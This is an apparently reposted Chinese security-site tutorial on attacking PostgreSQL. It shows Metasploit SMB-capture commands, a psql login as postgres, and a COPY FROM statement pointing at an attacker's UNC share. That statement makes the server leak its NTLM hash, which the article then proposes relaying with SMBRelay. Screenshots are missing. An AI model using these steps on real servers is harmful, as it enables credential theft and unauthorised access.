热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

PostgreSQL数据库攻击技术

发布时间:2012-02-16 09:40文章来源:dis9文章作者:秩名 点击次数:
摘要:前面说了MYSQL的,现在来说postgres ,只需要是postgres数据库用户就能成功的进行攻击,老样子先构造个SMB SERVER。 看数据库的启动权限是默认的: 恩,不用注入点了,搭建环境费时间, msf use auxiliary/server/capture/smb msf auxiliary(smb) exploit [*]...

前面说了MYSQL的,现在来说postgres ,只需要是postgres数据库用户就能成功的进行攻击,老样子先构造个SMB SERVER。

看数据库的启动权限是默认的:

数据库攻击

恩,不用注入点了,搭建环境费时间,
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) >

下面来链接PG数据库
[email protected]:~# psql -h 192.1.1.130 -U postgres
用户 postgres 的口令:
psql (8.4.9, 服务器 8.3.17)
警告:psql 版本8.4, 服务器版本8.3.
一些psql功能可能无法工作.
输入 "help" 来获取帮助信息.

postgres=#

用老方法读本地伪造的共享,我们就能获得HASH
CREATE TABLE sb(sb text);

COPY sb(sb) FROM '\\192.1.1.129\hacked.txt';

看控制台

数据库攻击

而METASPLOIT的模块成功获得了HASH

数据库攻击

下面我们直接来获得权限 用MSF的SMBRelay模块在读一次。

数据库攻击

原文http://www.dis9.com/postgresql-database-smbrelay-attack.html

标签分类: 数据库 攻击技术

上一篇:Mysql数据库攻击技术
下一篇:九招预防路由器遭攻击